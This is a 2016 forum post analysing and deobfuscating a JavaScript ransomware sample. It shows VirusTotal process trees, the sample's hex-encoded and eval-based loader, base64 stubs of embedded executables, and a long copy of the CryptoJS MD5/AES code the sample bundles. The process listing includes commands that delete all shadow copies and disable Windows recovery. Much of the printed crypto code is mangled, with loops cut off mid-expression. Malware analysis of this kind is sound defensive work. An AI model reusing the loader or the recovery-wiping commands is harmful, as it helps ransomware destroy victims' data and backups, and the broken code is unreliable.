Malware Analysis Deobfuscation - Amazing advanced sample - JS/Ransom.BA!tr - all in one

DardiM · Aug 26, 2016

From Malware Vault sample pack : 26-8-16 #7
(Thanks to @Solarquest)

Sample 7 :
Копия.js

2 / 56 (when I posted this part)
Antivirus scan for 78e67b7118e99316922df6bc9b34c375ce0ce50b024f0cdecc3de68db8099d66 at 2016-08-31 16:37:42 UTC - VirusTotal

Why this sample? It seems to be a a js Script and ransomware, all in one

(it contains inside all the files needed)

On virus total, we can see the processes (spoiler) :

wscript.exe "C:\_25.08.2016_.___._1___d_.ec7d272.js" (PID: 3100)
- WINWORD.EXE /n "%TEMP%\doc_b5c7d9.docx" (PID: 2364)
- df986316b86.exe (PID: 3332)
  - df986316b86.exe (PID: 3380)
    - mshta.exe "%USERPROFILE%\Desktop\VAULT.hta" (PID: 3264)
    - WMIC.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" (PID: 2908)

WmiPrvSE.exe %WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding (PID: 3712)
- cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures (PID: 1672)
  - vssadmin.exe delete shadows /all /quiet (PID: 3860)
  - bcdedit.exe /set {default} recoveryenabled no (PID: 3956)
  - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures (PID: 4080)

Analysed 11 processes in total (System Resource Monitor).

1) What it looks like :

/// 0745a4b767c07c1155c3f4c438150653
/////// x4F\x74\x2F\x2F\x2F\x4F\x6F\x2F\x2F\x4F\x6E\x2F\x2F\x4F\x70\x2F\x2F\x2F\x4F\x71\x2F\x2F\x4F\x73\x2F\x2F\x4F\x72\x2F\x2F\x2F\x4F\x42\x2B\x61\x50\x2F\x2F\x4F\x43\x2F\x2F\x2B\x4F\x4D\x2F\x2F\x2F\x4F\x4C\x2F\x4B\x50\x2F\x2F\x4F\x4E\x2F\x2F\x2B\x4F\x4F\x2B\x6F\x2F\x2F\x2F\x4F\x51\x2F\x36\x50\x2F\x2F\x2B\x4F\x50\x2F\x2F\x4F\x4B\x2F\x2F\x4F\x4A\x2F\x2F\x4F\x45\x2F\x2F\x2F\x4F\x44\x2F\x2F\x4F\x46\x2F\x2F\x4F\x47\x2F\x2F\x4F\x49\x2F\x2F\x4F\x48\x2F\x2F\x50\x70\x2F\x2F\x50\x71\x2F\x2F\x51\x37\x2F\x2F\x36\x2F\x51\x36\x2F\x2F\x2B\x2F\x51\x38\x2F\x2F\x51\x39\x2F\x2F\x51\x62\x2B\x6B\x2F\x2F\x51\x61\x2F\x2F\x51\x35\x2F\x2F\x51\x34\x2F\x2F\x50\x5A\x2F\x2F\x50\x59\x2F\x2F\x51\x30\x2F\x2F\x51\x31\x2F\x2F\x51\x33\x2F\x2F\x51\x32\x2F\x2F\x2F\x51\x63\x2F\x2F\x51\x64\x2F\x2F\x51\x6E\x2F\x2F\x51\x6D\x2F\x2F\x51\x6F\x2F\x2F\x51\x70\x2F\x2F\x51\x71\x2F\x2F\x51\x6C\x2F\x2F\x2B\x51\x6B\x2F\x2F\x2B\x51\x66\x2F\x2F\x51\x65\x2F\x2F\x51\x67\x2F\x2F\x2F\x51\x68\x2F\x2F\x51\x6A\x2F\x2F\x2B\x51\x69\x2F\x2F\x2B\x50\x58\x2F\x2F\x50\x56\x2F\x2F\x50\x41\x2F\x2F\x50\x7A\x2F\x2F\x50\x42\x2F\x2F\x50\x43\x2F\x2F\x50\x45\x2F\x2F\x50\x44\x2F\x2F\x50\x79\x2F\x2F\x50\x78\x2F\x2F\x50\x73\x2F\x2F\x2B\x2F\x50\x72\x2F\x2F\x50\x74\x2F\x2F\x50\x75\x2F\x2F\x50\x77\x2F\x2F\x50\x76\x2F\x2F\x50\x46\x2F\x2F\x50\x47\x2F\x2F\x50\x51\x2F\x2F\x50\x50\x2F\x2F\x50\x52\x2F\x2F\x2F\x50\x53\x2F\x2F\x50\x55\x2F\x2F\x50\x54\x2B\x6B\x2F\x2F\x2B\x50\x4F\x2F\x2F\x50\x4E\x2F\x2F\x2B\x50\x49\x2F\x2F\x2B\x50\x48\x2F\x2F\x50\x4A\x2F\x2F\x50\x4B\x2F\x2F\x50\x4D\x2F\x2F\x50\x4C\x2F\x2F\x4F\x6D\x2F\x2F\x4F\x6C\x2F\x2F\x4D\x56\x2F\x2F\x4D\x55\x2F\x2F\x4D\x57\x2F\x2F\x4D\x58\x2F\x2F\x4D\x5A\x2F\x2F\x2F\x4D\x59\x2F\x2F\x4D\x54\x2F\x2F\x4D\x53\x2F\x2F\x4D\x4C\x2F\x2F\x4D\x4B\x2F\x2F\x4D\x4E\x2F\x2F\x4D\x4F\x2F\x2F\x4D\x52\x2F\x2F\x4D\x51\x2F\x2F\x2F\x4E\x30\x2F\x2F\x4E\x31\x2F\x2F\x4E\x62\x2F\x2F\x4E\x61\x2F\x2F\x4E\x63\x2F\x2F\x2B\x4E\x64\x2F\x2F\x4E\x66\x2F\x2F\x4E\x65\x2F\x2F\x4E\x39\x2F\x2F\x2F\x4E\x38\x2F\x2F\x4E\x33\x2F\x2F\x4E\x32\x2F\x2F\x4E\x34\x2F\x2F\x4E\x35\x2F\x2F\x4E\x37\x2F\x2F\x4E\x36\x2F\x2F\x4D\x4A\x2F\x2F\x4D\x49\x2F\x2F\x2F\x4D\x6C\x2F\x2F\x4D\x6B\x2F\x2F\x4D\x6D\x2F\x2F\x2B\x4D\x6E\x2F\x2F\x4D\x71\x2F\x2F\x4D\x6F\x2B\x6B\x2F\x2F\x4D\x6A\x2F\x2F\x4D\x69\x2F\x2F\x4D\x64\x2F\x2F\x2F\x4D\x63\x2F\x2F\x4D\x65\x2F\x2F\x4D\x66\x2F\x2F\x4D\x68\x2F\x2F\x4D\x67\x2F\x2F\x4D\x72\x2F\x2F\x4D\x73\x2F\x2F\x4D\x44\x2F\x2F\x4D\x43\x2F\x2F\x4D\x45\x2F\x2F\x4D\x46\x2F\x2F\x4D\x48\x2F\x2F\x35\x70\x2F\x70\x50\x2F\x2F\x4D\x47\x2F\x2F\x2B\x4D\x42\x2F\x2F\x4D\x7A\x2F\x2F\x4D\x75\x2F\x2F\x2B\x4D\x74\x2F\x2F\x4D\x76\x2F\x2F\x4D\x77\x2F\x2F\x2B\x4D\x79\x2F\x2F\x4D\x78\x2F\x2F\x4E\x67\x2F\x2F\x4E\x68\x2F\x2F\x4E\x5A\x2F\x2F\x4E\x58\x2F\x2F\x4F\x30\x2F\x2F\x2F\x4F\x31\x2F\x2F\x4F\x34\x2F\x2F\x4F\x32\x2F\x2F\x4E\x57\x2F\x2F\x4E\x56\x2F\x2F\x4E\x50\x2F\x2F\x38\x2B\x4E\x4F\x2F\x2F\x4E\x51\x2F\x2F\x4E\x52\x2F\x2F\x4E\x55\x2F\x2F\x4E\x54\x2F\x2F\x4F\x35\x2F\x2F\x4F\x36\x2F\x2F\x4F\x67\x2F\x2F\x2B\x4F\x66\x2F\x2F\x2B\x4F\x68\x2F\x2F\x4F\x69\x2F\x2F\x4F\x6B\x2B\x6B\x2F\x2F\x2F\x4F\x6A\x2F\x2F\x4F\x65\x2F\x2F\x4F\x64\x2F\x2F\x4F\x38\x2F\x2F\x4F\x37\x2F\x2F\x4F\x39\x2F\x2F\x4F\x61\x2F\x2F\x4F\x63\x2F\x2F\x4F\x62\x2F\x2F\x2F\x4E\x4E\x2F\x2F\x4E\x4D\x2F\x2F\x4E\x72\x2F\x2F\x4E\x71\x2F\x2F\x4E\x73\x2F\x2F\x4E\x74\x2F\x2F\x2B\x4E\x76\x2F\x2F\x4E\x75\x2F\x2F\x4E\x70\x2F\x2F\x4E\x6F\x2F\x2F\x4E\x6A\x2F\x2F\x4E\x69\x2F\x2F\x4E\x6B\x2F\x2F\x4E\x6C\x2F\x2F\x4E\x6E\x2F\x2F\x4E\x6D\x2F\x2F\x4E\x77\x2F\x2F\x4E\x78\x2F\x2F\x4E\x48\x2F\x2F\x4E\x47\x2F\x2F\x4E\x49\x2F\x2F\x2B\x4E\x4A\x2B\x70\x50\x2F\x2F\x4E\x4C\x2F\x2F\x4E\x4B\x2F\x2F\x4E\x46\x2F\x2F\x4E\x45\x2F\x2F\x4E\x7A\x2F\x2F\x2B\x4E\x79\x2F\x2F\x4E\x41\x2F\x2F\x4E\x42\x2F\x2F\x2B\x4E\x44\x2F\x2F\x4E\x43\x2F\x2F\x51\x72\x2F\x2F\x51\x73\x2F\x2F\x54\x6D\x2F\x2F\x54\x6C\x2F\x2F\x54\x6E\x2F\x2F\x54\x6F\x2F\x2F\x54\x72\x2B\x6B\x2F\x2F\x2F\x54\x70\x2F\x2F\x54\x6B\x2F\x2F\x54\x6A\x2F\x2F\x54\x65\x2F\x2F\x54\x64\x2F\x2F\x54\x66\x2F\x2F\x54\x67\x2F\x2F\x54\x69\x2F\x2F\x54\x68\x2F\x2F\x54\x73\x2F\x2F\x54\x74\x2F\x2F\x54\x46\x2F\x2F\x54\x44\x2F\x2F\x54\x47\x2F\x2F\x54\x48\x2F\x2F\x54\x4B\x2F\x2F\x54\x49\x2F\x2F\x54\x43\x2F\x2F\x2B\x54\x41\x2F\x2F\x54\x76\x2F\x2F\x54\x75\x2F\x2F\x54\x77\x2F\x2F\x54\x78\x2F\x2F\x54\x7A\x2F\x2F\x54\x79\x2F\x2F\x54\x63\x2F\x2F\x54\x62\x2F\x2F\x53\x50\x2F\x2F\x53\x4F\x2F\x2F\x2B\x53\x51\x2F\x2F\x2B\x53\x52\x2F\x2F\x53\x55\x2F\x2F\x53\x53\x2F\x2F\x53\x4E\x2F\x2F\x53\x4D\x2F\x2F\x53\x48\x2F\x2F\x2F\x53\x47\x2F\x2F\x53\x49\x2F\x2F\x53\x4A\x2F\x2F\x53\x4C\x2F\x2F\x53\x4B\x2B\x4B\x54\x2F\x2F\x53\x56\x2F\x2F\x2B\x53\x57\x2F\x2F\x54\x36\x2B\x36\x54\x2F\x2F\x54\x35\x2F\x2F\x54\x37\x2F\x2F\x54\x38\x2F\x71\x54\x2F\x2F\x2B\x54\x61\x2B\x6B\x2F\x2F\x54\x39\x2F\x2F\x54\x34\x2F\x2F\x2B\x2F\x54\x33\x2F\x2F\x53\x59\x2F\x2F\x53\x58\x2F\x2F\x36\x2F\x53\x5A\x2F\x2F\x54\x30\x2F\x2F\x54\x32\x2F\x2F\x37\x2F\x54\x31\x2F\x2F\x2B\x54\x4C\x2F\x2F\x54\x4D\x2F\x2F\x55\x78\x2F\x2F\x55\x77\x2F\x2F\x55\x79\x2F\x2F\x2B\x2F\x55\x7A\x2F\x2F\x55\x42\x2F\x2F\x55\x41\x2F\x2F\x55\x76\x2F\x2F\x2B\x55\x75\x2F\x2F\x55\x6D\x2F\x2F\x55\x6C\x2F\x2F\x2B\x55\x6E\x2F\x2F\x55\x70\x2F\x2F\x55\x73\x2F\x2F\x55\x72\x2F\x2F\x55\x43\x2F\x2F\x55\x44\x2F\x2F\x55\x51\x2F\x2F\x55\x4F\x2F\x2F\x55\x52\x2F\x2F\x38\x2F\x55\x53\x2F\x2F\x55\x54\x2F\x2F\x55\x4E\x2F\x2F\x2F\x55\x4C\x2F\x2F\x55\x46\x2F\x2F\x55\x45\x2F\x2F\x2B\x55\x47\x2F\x2F\x55\x48\x2F\x2F\x55\x4B\x2F\x2F\x2F\x55\x4A\x2F\x2F\x55\x6B\x2F\x2F\x55\x6A\x2F\x2F\x2F\x54\x57\x2F\x2F\x54\x56\x2F\x2F\x54\x58\x2F\x2F\x54\x59\x2F\x2F\x55\x30\x2F\x2F\x2B\x54\x5A\x2B\x6C\x2F\x2F\x54\x55\x2F\x2F\x54\x54\x2F\x2F\x54\x4F\x2F\x2F\x54\x4E\x2F\x2F\x54\x50\x2F\x2F\x54\x51\x2F\x2F\x2B\x54\x53\x2F\x2F\x54\x52\x2F\x2F\x2B\x55\x31\x2F\x2F\x55\x32\x2F\x2F\x55\x65\x2F\x2F\x55\x64\x2F\x2F\x55\x66\x2F\x2F\x55\x67\x2F\x2F\x55\x69\x2F\x2F\x2F\x55\x68\x2F\x70\x66\x2F\x2F\x55\x62\x2F\x2F\x55\x61\x2F\x2F\x55\x34\x2F\x2F\x55\x33\x2F\x2F\x55\x36\x2F\x2F\x55\x37\x2F\x2F\x55\x39\x2F\x2F\x55\x38\x2F\x2F\x2B\x2B\x53\x45\x2F\x2F\x53\x44\x2F\x2F\x52\x39\x2F\x2F\x2B\x52\x38\x2F\x2F\x52\x61\x2F\x2F\x2B\x52\x62\x2F\x2F\x2B\x52\x65\x2F\x2F\x52\x64\x2F\x2F\x52\x37\x2F\x2F\x2B\x52\x36\x2F\x2F\x52\x31\x2F\x2F\x52\x30\x2F\x2F\x52\x32\x2F\x2F\x52\x33\x2F\x2F\x52\x35\x2F\x2F\x2F\x52\x34\x2F\x2F\x52\x66\x2F\x2F\x52\x67\x2F\x2F\x2F\x52\x72\x2F\x2F\x52\x71\x2F\x2F\x52\x73\x2F\x2F\x52\x74\x2F\x2F\x52\x76\x2F\x2F\x52\x75\x2B\x6C\x2F\x2F\x2B\x52\x6F\x2F\x2F\x52\x6E\x2F\x2F\x52\x69\x2F\x2F\x2F\x52\x68\x2F\x2F\x52\x6A\x2F\x2F\x52\x6B\x2F\x2F\x2B\x52\x6D\x2F\x2F\x52\x6C\x2F\x2F\x51\x5A\x2F\x2F\x2F\x51\x59\x2F\x2F\x51\x43\x2F\x2F\x51\x42\x2F\x2F\x2B\x51\x44\x2F\x2F\x51\x45\x2F\x2F\x51\x47\x2F\x2F\x51\x46\x2F\x2F\x51\x41\x2F\x2F\x51\x7A\x2F\x2F\x51\x75\x2F\x2F\x51\x74\x2F\x2F\x51\x76\x2F\x2F\x51\x77\x2F
...
...

2) Looking better each lines :

Removing all useless parts :

var _0xf7f9 = [ a lot of \xValues ]; (when I say a lot of : all the real script part (that contains a doc file etc)

eval(
function(_0x6b18x1, _0x6b18x2, _0x6b18x3, _0x6b18x4, _0x6b18x5, _0x6b18x6) {

_0x6b18x5 = function(_0x6b18x3) {
return (_0x6b18x3 < _0x6b18x2 ? _0xf7f9[4] : _0x6b18x5(parseInt(_0x6b18x3 / _0x6b18x2))) + (35 < (_0x6b18x3 %= _0x6b18x2) ? String[_0xf7f9[5]](_0x6b18x3 + 29) : _0x6b18x3.toString(36))
};
if (!_0xf7f9[4][_0xf7f9[6]](/^/, String)) {

for (; _0x6b18x3--

{
_0x6b18x6[_0x6b18x5(_0x6b18x3)] = _0x6b18x4[_0x6b18x3] || _0x6b18x5(_0x6b18x3)
};

_0x6b18x4 = [function(_0x6b18x3) {

return _0x6b18x6[_0x6b18x3]
}];

_0x6b18x5 = function() {

return _0xf7f9[7]

};
_0x6b18x3 = 1
};
for (; _0x6b18x3--

{
_0x6b18x4[_0x6b18x3] && (_0x6b18x1 = _0x6b18x1[_0xf7f9[6]](new RegExp(_0xf7f9[8] + _0x6b18x5(_0x6b18x3) + _0xf7f9[8], _0xf7f9[9]), _0x6b18x4[_0x6b18x3]))

};

return _0x6b18x1

}(_0xf7f9[0], 62, 8403, _0xf7f9[3][_0xf7f9[2]](_0xf7f9[1]), 0, {})
);
);

The function in the eval() builds all the real part, and eval ... run the bad parts ...

MUST SEE, but a lot of lines

var y59526 = .........
var yeacb7 = y59526;
yeacb7 += "/v1pCkAAAAAAAAAAA..........
var y8d17e = yeacb7;
y8d17e += "Y87iR74BT..............
var yfcd0f = "UEsDBBQABgA
var y59526 = ="TVqQAAMAAAAEA.............."
(files hidden in above vars)

var CryptoJS = CryptoJS || function(e, l) {

var c = {},

p = c.lib = {},
u = function() {},
w = p.Base = {

extend: function(a) {

u.prototype = this;
var d = new u;
a && d.mixIn(a);
d.hasOwnProperty("init") || (d.init = function() {

d.$super.init.apply(this, arguments)

});
d.init.prototype = d;
d.$super = this;
return d

},
create: function() {

var a = this.extend();
a.init.apply(a, arguments);
return a

},
init: function() {},
mixIn: function(a) {

for (var d in a) a.hasOwnProperty(d) && (this[d] = a[d]);
a.hasOwnProperty("toString") && (this.toString = a.toString)

},
clone: function() {

return this.init.prototype.extend(this)

}

},
t = p.WordArray = w.extend({

init: function(a, d) {

a = this.words = a || [];
this.sigBytes = d != l ? d : 4 * a.length

},
toString: function(a) {

return (a || v).stringify(this)

},
concat: function(a) {

var d = this.words,
f = a.words,
n = this.sigBytes;
a = a.sigBytes;
this.clamp();
if (n % 4)

for (var q = 0; q >> 2] |= (f[q >>> 2] >>> 24 - q % 4 * 8 & 255) << 24 - (n + q) % 4 * 8;

else if (65535 >> 2] = f[q >>> 2];
else d.push.apply(d, f);
this.sigBytes += a;
return this

},
clamp: function() {

var a = this.words,
d = this.sigBytes;
a[d >>> 2] &= 4294967295 << 32 - d % 4 * 8;
a.length = e.ceil(d / 4)

},
clone: function() {

var a = w.clone.call(this);
a.words = this.words.slice(0);
return a

},
random: function(a) {

for (var d = [], f = 0; f >> 2] >>> 24 - n % 4 * 8 & 255;
f.push((q >>> 4).toString(16));
f.push((q & 15).toString(16))

}
return f.join("")

}, parse: function(a) {

for (var d = a.length, f = [], n = 0; n >> 3] |= parseInt(a.substr(n, 2), 16) << 24 - n % 8 * 4;
return new t.init(f, d / 2)

}

},
b = x.Latin1 = {

stringify: function(a) {
var d = a.words;
a = a.sigBytes;
for (var f = [], n = 0; n >> 2] >>> 24 - n % 4 * 8 & 255));
return f.join("")

},
parse: function(a) {

for (var d = a.length, f = [], n = 0; n >> 2] |= (a.charCodeAt

& 255) << 24 - n % 4 * 8;
return new t.init(f, d)

}

}, y = x.Utf8 = {

stringify: function(a) {

try {

return decodeURIComponent(escape(b.stringify(a)))

} catch (d) {

throw Error("Malformed UTF-8 data")

}

},
parse: function(a) {

return b.parse(unescape(encodeURIComponent(a)))

}

}, r = p.BufferedBlockAlgorithm = w.extend({

reset: function() {

this._data = new t.init;
this._nDataBytes = 0

},
_append: function(a) {

"string" == typeof a && (a = y.parse(a));
this._data.concat(a);
this._nDataBytes += a.sigBytes

},
_process: function(a) {

var d = this._data,
f = d.words,
n = d.sigBytes,
q = this.blockSize,
b = n / (4 * q),
b = a ? e.ceil(b) : e.max((b | 0) - this._minBufferSize, 0);
a = b * q;
n = e.min(4 * a, n);
if (a) {
for (var r = 0; r >> 2] >>> 24 - t % 4 * 8 & 255) << 16 | (p[t + 1 >>> 2] >>> 24 - (t + 1) % 4 * 8 & 255) << 8 | p[t + 2 >>> 2] >>> 24 - (t + 2) % 4 * 8 & 255, v = 0;
4 > v && t + .75 * v >> 6 * (3 - v) & 63));
if (p = e.charAt(64))

for (; c.length % 4

c.push(p);
return c.join("")

}, parse: function(c) {

var p = c.length,
e = this._map,
w = e.charAt(64);
w && (w = c.indexOf(w), -1 != w && (p = w));

for (var w = [], t = 0, x = 0; x >> 6 - x % 4 * 2; w[t >>> 2] |= (v | b) << 24 - t % 4 * 8; t++

}
return l.create(w, t)

}, _map: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

}
})();
(function(e) {

function l(b, c, a, d, f, n, q) {

b = b + (c & a | ~c & d) + f + q;
return (b < >> 32 - n) + c

}
function c(b, c, a, d, f, n, q) {

b = b + (c & d | a & ~d) + f + q;
return (b < >> 32 - n) + c

}

function p(b, c, a, d, f, n, q) {

b = b + (c ^ a ^ d) + f + q;
return (b < >> 32 - n) + c

}
function u(b, c, a, d, f, n, q) {

b = b + (a ^ (c | ~d)) + f + q;
return (b < >> 32 - n) + c

}
for (var w = CryptoJS, t = w.lib, x = t.WordArray, v = t.Hasher, t = w.algo, b = [], y = 0; 64 > y; y++) b[y] = 4294967296 * e.abs(e.sin(y + 1)) | 0;
t = t.MD5 = v.extend({

_doReset: function() {

this._hash = new x.init([1732584193, 4023233417, 2562383102, 271733878])

},

_doProcessBlock: function(r, e) {
for (var a = 0; 16 > a; a++) {

var d = e + a,
f = r[d];
r[d] = (f << 8 | f >>> 24) & 16711935 | (f << 24 | f >>> 8) & 4278255360

}
var a = this._hash.words,

d = r[e + 0],
f = r[e + 1],
n = r[e + 2],
q = r[e + 3],
B = r[e + 4],
t = r[e + 5],
w = r[e + 6],
x = r[e + 7],
v = r[e + 8],
C = r[e + 9],
D = r[e + 10],
E = r[e + 11],
F = r[e + 12],
G = r[e + 13],
H = r[e + 14],
y = r[e + 15],
g = a[0],
m = a[1],
h = a[2],
k = a[3],
g = l(g, m, h, k, d, 7, b[0]),
k = l(k, g, m, h, f, 12, b[1]),
h = l(h, k, g, m, n, 17, b[2]),
m = l(m, h, k, g, q, 22, b[3]),
g = l(g, m, h, k, B, 7, b[4]),
k = l(k, g, m, h, t, 12, b[5]),
h = l(h, k, g, m, w, 17, b[6]),
m = l(m, h, k, g, x, 22, b[7]),
g = l(g, m, h, k, v, 7, b[8]),
k = l(k, g, m, h, C, 12, b[9]),
h = l(h, k, g, m, D, 17, b[10]),
m = l(m, h, k, g, E, 22, b[11]),
g = l(g, m, h, k, F, 7, b[12]),
k = l(k, g, m, h, G, 12, b[13]),
h = l(h, k, g, m, H, 17, b[14]),
m = l(m, h, k, g, y, 22, b[15]),
g = c(g, m, h, k, f, 5, b[16]),
k = c(k, g, m, h, w, 9, b[17]),
h = c(h, k, g, m, E, 14, b[18]),
m = c(m, h, k, g, d, 20, b[19]),
g = c(g, m, h, k, t, 5, b[20]),
k = c(k, g, m, h, D, 9, b[21]),
h = c(h, k, g, m, y, 14, b[22]),
m = c(m, h, k, g, B, 20, b[23]),
g = c(g, m, h, k, C, 5, b[24]),
k = c(k, g, m, h, H, 9, b[25]),
h = c(h, k, g, m, q, 14, b[26]),
m = c(m, h, k, g, v, 20, b[27]),
g = c(g, m, h, k, G, 5, b[28]),
k = c(k, g, m, h, n, 9, b[29]),
h = c(h, k, g, m, x, 14, b[30]),
m = c(m, h, k, g, F, 20, b[31]),
g = p(g, m, h, k, t, 4, b[32]),
k = p(k, g, m, h, v, 11, b[33]),
h = p(h, k, g, m, E, 16, b[34]),
m = p(m, h, k, g, H, 23, b[35]),
g = p(g, m, h, k, f, 4, b[36]),
k = p(k, g, m, h, B, 11, b[37]),
h = p(h, k, g, m, x, 16, b[38]),
m = p(m, h, k, g, D, 23, b[39]),
g = p(g, m, h, k, G, 4, b[40]),
k = p(k, g, m, h, d, 11, b[41]),
h = p(h, k, g, m, q, 16, b[42]),
m = p(m, h, k, g, w, 23, b[43]),
g = p(g, m, h, k, C, 4, b[44]),
k = p(k, g, m, h, F, 11, b[45]),
h = p(h, k, g, m, y, 16, b[46]),
m = p(m, h, k, g, n, 23, b[47]),
g = u(g, m, h, k, d, 6, b[48]),
k = u(k, g, m, h, x, 10, b[49]),
h = u(h, k, g, m, H, 15, b[50]),
m = u(m, h, k, g, t, 21, b[51]),
g = u(g, m, h, k, F, 6, b[52]),
k = u(k, g, m, h, q, 10, b[53]),
h = u(h, k, g, m, D, 15, b[54]),
m = u(m, h, k, g, f, 21, b[55]),
g = u(g, m, h, k, v, 6, b[56]),
k = u(k, g, m, h, y, 10, b[57]),
h = u(h, k, g, m, w, 15, b[58]),
m = u(m, h, k, g, G, 21, b[59]),
g = u(g, m, h, k, B, 6, b[60]),
k = u(k, g, m, h, E, 10, b[61]),
h = u(h, k, g, m, n, 15, b[62]),
m = u(m, h, k, g, C, 21, b[63]);
a[0] = a[0] + g | 0;
a[1] = a[1] + m | 0;
a[2] = a[2] + h | 0;
a[3] = a[3] + k | 0

},
_doFinalize: function() {

var b = this._data,
c = b.words,
a = 8 * this._nDataBytes,
d = 8 * b.sigBytes;
c[d >>> 5] |= 128 << 24 - d % 32;
var f = e.floor(a / 4294967296);
c[(d + 64 >>> 9 << 4) + 15] = (f << 8 | f >>> 24) & 16711935 | (f << 24 | f >>> 8) & 4278255360;
c[(d + 64 >>> 9 << 4) + 14] = (a << 8 | a >>> 24) & 16711935 | (a << 24 | a >>> 8) & 4278255360;
b.sigBytes = 4 * (c.length + 1);
this._process();
b = this._hash;
c = b.words;
for (a = 0; 4 > a; a++) d = c[a], c[a] = (d << 8 | d >>> 24) & 16711935 | (d << 24 | d >>> 8) & 4278255360;
return b

},
clone: function() {

var b = v.clone.call(this);
b._hash = this._hash.clone();
return b

}

});

w.MD5 = v._createHelper(t);
w.HmacMD5 = v._createHmacHelper(t)

})(Math);
(function() {

var e = CryptoJS,
l = e.lib,
c = l.Base,
p = l.WordArray,
l = e.algo,
u = l.EvpKDF = c.extend({
cfg: c.extend({
keySize: 4,
hasher: l.MD5,
iterations: 1

}),
init: function(c) {

this.cfg = this.cfg.extend(c)

},
compute: function(c, e) {

for (var l = this.cfg, v = l.hasher.create(), b = p.create(), u = b.words, r = l.keySize, l = l.iterations; u.length >> 2] & 255

}
}; c.BlockCipher = v.extend({

cfg: v.cfg.extend({
mode: b,
padding: r

}),
reset: function() {

v.reset.call(this);
var a = this.cfg,
b = a.iv,
a = a.mode;
if (this._xformMode == this._ENC_XFORM_MODE) var c = a.createEncryptor;
else c = a.createDecryptor, this._minBufferSize = 1;
this._mode = c.call(a, this, b && b.words)

},
_doProcessBlock: function(a, b) {

this._mode.processBlock(a, b)

},
_doFinalize: function() {

var a = this.cfg.padding;
if (this._xformMode == this._ENC_XFORM_MODE) {

a.pad(this._data, this.blockSize);
var b = this._process(!0)

} else b = this._process(!0), a.unpad(b);
return b

},
blockSize: 4
});
var z = c.CipherParams = p.extend({

init: function(a) {
this.mixIn(a)

},
toString: function(a) {

return (a || this.formatter).stringify(this)

}
}), b = (l.format = {}).OpenSSL = {
stringify: function(a) {

var b = a.ciphertext;
a = a.salt;
return (a ? u.create([1398893684, 1701076831]).concat(a).concat(b) : b).toString(t)

},
parse: function(a) {

a = t.parse(a);
var b = a.words;
if (1398893684 == b[0] && 1701076831 == b[1]) {
var c = u.create(b.slice(2, 4));
b.splice(0, 4);
a.sigBytes -= 16

}
return z.create({

ciphertext: a,
salt: c

})
}
}, a = c.SerializableCipher = p.extend({
cfg: p.extend({
format: b
}),
encrypt: function(a, b, c, d) {

d = this.cfg.extend(d);
var e = a.createEncryptor(c, d);
b = e.finalize(b);
e = e.cfg;
return z.create({

ciphertext: b,
key: c,
iv: e.iv,
algorithm: a,
mode: e.mode,
padding: e.padding,
blockSize: a.blockSize,
formatter: d.format

})

},
decrypt: function(a, b, c, d) {

d = this.cfg.extend(d);
b = this._parse(b, d.format);
return a.createDecryptor(c, d).finalize(b.ciphertext)

},
_parse: function(a, b) {

return "string" == typeof a ? b.parse(a, this) : a

}
}), l = (l.kdf = {}).OpenSSL = {

execute: function(a, b, c, d) {

d || (d = u.random(8));
a = x.create({

keySize: b + c

}).compute(a, d);
c = u.create(a.words.slice(b), 4 * c);
a.sigBytes = 4 * b;
return z.create({
key: a,
iv: c,
salt: d
})

}

}, d = c.PasswordBasedCipher = a.extend({

cfg: a.cfg.extend({
kdf: l

}),
encrypt: function(b, c, d, e) {

e = this.cfg.extend(e);
d = e.kdf.execute(d, b.keySize, b.ivSize);
e.iv = d.iv;
b = a.encrypt.call(this, b, c, d.key, e);
b.mixIn(d);
return b

},
decrypt: function(b, c, d, e) {

e = this.cfg.extend(e);
c = this._parse(c, e.format);
d = e.kdf.execute(d, b.keySize, b.ivSize, c.salt);
e.iv = d.iv;
return a.decrypt.call(this, b, c, d.key, e)

}
})
}();
(function() {

for (var e = CryptoJS, l = e.lib.BlockCipher, c = e.algo, p = [], u = [], w = [], t = [], x = [], v = [], b = [], y = [], r = [], z = [], a = [], d = 0; 256 > d; d++) a[d] = 128 > d ? d << 1 : d << 1 ^ 283;
for (var f = 0, n = 0, d = 0; 256 > d; d++) {
var q = n ^ n << 1 ^ n << 2 ^ n << 3 ^ n << 4,
q = q >>> 8 ^ q & 255 ^ 99;
p[f] = q;
u[q] = f;
var B = a[f],
I = a,
J = a,
A = 257 * a[q] ^ 16843008 * q;
w[f] = A << 24 | A >>> 8;
t[f] = A << 16 | A >>> 16;
x[f] = A << 8 | A >>> 24;
v[f] = A;
A = 16843009 * J ^ 65537 * I ^ 257 * B ^ 16843008 * f;
b[q] = A << 24 | A >>> 8;
y[q] = A << 16 | A >>> 16;
r[q] = A << 8 | A >>> 24;
z[q] = A;
f ? (f = B ^ a[a[a[J ^ B]]], n ^= a[a[n]]) : f = n = 1

}
var K = [0, 1, 2, 4, 8, 16, 32, 64, 128, 27, 54],
c = c.AES = l.extend({

_doReset: function() {
for (var a = this._key, c = a.words, d = a.sigBytes / 4, a = 4 * ((this._nRounds = d + 6) + 1), f = this._keySchedule = [], e = 0; e >> 24] << 24 | p[l >>> 16 & 255] << 16 | p[l >>> 8 & 255] << 8 | p[l & 255]): (l = l << 8 | l >>> 24, l = p[l >>> 24] << 24 | p[l >>> 16 & 255] << 16 | p[l >>> 8 & 255] << 8 | p[l & 255], l ^= K[e / d | 0] << 24);f[e] = f[e - d] ^ l
}

c = this._invKeySchedule = [];
for (d = 0; dd || 4 >= e ? l : b[p[l >>> 24]] ^ y[p[l >>> 16 & 255]] ^ r[p[l >>> 8 & 255]] ^ z[p[l & 255]]
}, encryptBlock: function(a, b) {

this._doCryptBlock(a, b, this._keySchedule, w, t, x, v, p)

}, decryptBlock: function(a, c) {

var d = a[c + 1];
a[c + 1] = a[c + 3];
a[c + 3] = d;
this._doCryptBlock(a, c, this._invKeySchedule, b, y, r, z, u);
d = a[c + 1];
a[c + 1] = a[c + 3];
a[c + 3] = d

}, _doCryptBlock: function(a, b, c, d, e, f, l, g) {

